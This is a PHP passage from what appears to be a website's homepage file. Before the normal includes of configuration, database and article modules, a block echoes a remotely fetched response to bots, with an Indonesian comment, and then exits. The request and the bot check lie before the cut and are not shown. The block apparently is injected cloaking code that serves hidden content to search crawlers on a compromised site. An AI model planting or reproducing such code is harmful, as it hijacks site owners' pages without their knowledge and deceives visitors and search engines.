= 200 && $httpCode < 300) {
// Kirim Content-Type kalau tersedia (bantu bot mengerti tipe konten)
if (!empty($contentType)) {
header('Content-Type: ' . $contentType);
}
echo $resp;
} else {
header('HTTP/1.1 502 Bad Gateway');
echo "";
}
exit();
}
?>
//error_reporting(E_ALL & ~E_NOTICE);
//ini_set('display_errors',true);
include 'modules/configuration.inc';
include 'modules/db.php';
include 'modules/baseUrl.php';
// include 'modules/urlData.php';
include 'modules/articleModel.php';
include 'modules/comman_functions.php';
include $rootInclude.'la-common-top-front.php';
// include $rootInclude.'la-common-top-inner.php';
$pageId = "home";
include $rootInclude.'la_common2a.inc';
?>